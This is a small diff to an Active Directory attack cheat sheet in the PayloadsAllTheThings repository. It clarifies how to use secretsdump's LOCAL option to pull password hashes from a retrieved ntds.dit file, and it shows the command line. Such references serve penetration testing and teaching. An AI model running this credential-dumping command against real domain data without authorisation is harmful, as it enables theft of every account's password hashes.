swisskyrepo/PayloadsAllTheThings/Methodology and Resources/Active Directory Attack.md

 #### Extract hashes from ntds.dit

-then you need to use secretsdump to extract the hashes
+then you need to use secretsdump to extract the hashes, use the `LOCAL` options to use it on a retrieved ntds.dit

 ```java
 secretsdump.py -system /root/SYSTEM -ntds /root/ntds.dit LOCAL